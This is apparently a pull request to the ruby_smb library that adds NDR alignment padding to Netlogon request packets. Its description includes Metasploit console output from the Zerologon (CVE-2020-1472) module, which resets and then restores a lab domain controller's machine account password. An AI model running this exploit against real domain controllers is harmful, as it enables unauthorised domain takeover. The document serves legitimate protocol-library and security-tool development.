### PR TITLE
Add missing padding to Netlogon request packets

### DIFF
--- a/lib/ruby_smb/dcerpc/netlogon/netr_server_authenticate3_request.rb
+++ b/lib/ruby_smb/dcerpc/netlogon/netr_server_authenticate3_request.rb
@@ -11,10 +11,13 @@ module RubySMB
         endian :little
 
         logonsrv_handle              :primary_name
+        string                       :pad1, length: -> { pad_length(self.primary_name) }
         ndr_string                   :account_name
         netlogon_secure_channel_type :secure_channel_type
+        string                       :pad2, length: -> { pad_length(self.secure_channel_type) }
         ndr_string                   :computer_name
         netlogon_credential          :client_credential
+        string                       :pad3, length: -> { pad_length(self.client_credential) }
         uint32                       :flags
 
         def initialize_instance
@@ -22,6 +25,12 @@ module RubySMB
           @opnum = NETR_SERVER_AUTHENTICATE3
         end
 
+        # Determines the correct length for the padding, so that the next
+        # field is 4-byte aligned.
+        def pad_length(prev_element)
+          offset = (prev_element.abs_offset + prev_element.to_binary_s.length) % 4
+          (4 - offset) % 4
+        end
       end
     end
   end

--- a/lib/ruby_smb/dcerpc/netlogon/netr_server_password_set2_request.rb
+++ b/lib/ruby_smb/dcerpc/netlogon/netr_server_password_set2_request.rb
@@ -11,15 +11,25 @@ module RubySMB
         endian :little
 
         logonsrv_handle              :primary_name
+        string                       :pad1, length: -> { pad_length(self.primary_name) }
         ndr_string                   :account_name
         netlogon_secure_channel_type :secure_channel_type
+        string                       :pad2, length: -> { pad_length(self.secure_channel_type) }
         ndr_string                   :computer_name
+        string                       :pad3, length: -> { pad_length(self.computer_name) }
         netlogon_authenticator       :authenticator
         ndr_fixed_byte_array         :clear_new_password, length: 516 # this is an encrypted NL_TRUST_PASSWORD
 
         def initialize_instance
           super
           @opnum = Netlogon::NETR_SERVER_PASSWORD_SET2
+        end
+
+        # Determines the correct length for the padding, so that the next
+        # field is 4-byte aligned.
+        def pad_length(prev_element)
+          offset = (prev_element.abs_offset + prev_element.to_binary_s.length) % 4
+          (4 - offset) % 4
         end
       end
     end

--- a/lib/ruby_smb/dcerpc/netlogon/netr_server_req_challenge_request.rb
+++ b/lib/ruby_smb/dcerpc/netlogon/netr_server_req_challenge_request.rb
@@ -11,6 +11,7 @@ module RubySMB
         endian :little
 
         logonsrv_handle     :primary_name
+        string              :pad1, length: -> { pad_length(self.primary_name) }
         ndr_string          :computer_name
         netlogon_credential :client_challenge
 
@@ -19,6 +20,12 @@ module RubySMB
           @opnum = NETR_SERVER_REQ_CHALLENGE
         end
 
+        # Determines the correct length for the padding, so that the next
+        # field is 4-byte aligned.
+        def pad_length(prev_element)
+          offset = (prev_element.abs_offset + prev_element.to_binary_s.length) % 4
+          (4 - offset) % 4
+        end
       end
     end
   end


### PR DESCRIPTION
This fixes an issue with `netlogon` request packets when using specific computer name strings. Depending of the length of the string, padding is needed to comply with NDR syntax, as defined [here](https://pubs.opengroup.org/onlinepubs/9629399/chap14.htm#tagcjh_19_03_02). The issue can be demonstrated with the Metasploit `zerologon` exploit [module](https://github.com/rapid7/metasploit-framework/pull/14151):
### Without padding:
```
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > options

Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   NBNAME  DC01             yes       The server's NetBIOS name
   RHOSTS  172.16.60.222    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                    no        The netlogon RPC port (TCP)


Auxiliary action:

   Name    Description
   ----    -----------
   REMOVE  Remove the machine account password


msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
[*] Running module against 172.16.60.222

[*] 172.16.60.222: - Connecting to the endpoint mapper service...
[*] 172.16.60.222:49667 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:172.16.60.222[49667] ...
[*] 172.16.60.222:49667 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:172.16.60.222[49667] ...
[-] 172.16.60.222:49667 - Auxiliary aborted due to failure: unexpected-reply: The NetrServerReqChallenge Netlogon RPC request failed
[*] Auxiliary module execution completed
```
### With padding:
```
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > options

Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   NBNAME  DC01             yes       The server's NetBIOS name
   RHOSTS  172.16.60.222    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                    no        The netlogon RPC port (TCP)


Auxiliary action:

   Name    Description
   ----    -----------
   REMOVE  Remove the machine account password


msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
[*] Running module against 172.16.60.222

[*] 172.16.60.222: - Connecting to the endpoint mapper service...
[*] 172.16.60.222:49667 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:172.16.60.222[49667] ...
[*] 172.16.60.222:49667 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:172.16.60.222[49667] ...
[+] 172.16.60.222:49667 - Successfully authenticated
[+] 172.16.60.222:49667 - Successfully set the machine account (DC01$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set action RESTORE
action => RESTORE
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
[*] Running module against 172.16.60.222

[*] 172.16.60.222: - Connecting to the endpoint mapper service...
[*] 172.16.60.222:49667 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:172.16.60.222[49667] ...
[*] 172.16.60.222:49667 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:172.16.60.222[49667] ...
[+] 172.16.60.222:49667 - Successfully set machine account (DC01$) password
[*] Auxiliary module execution completed
```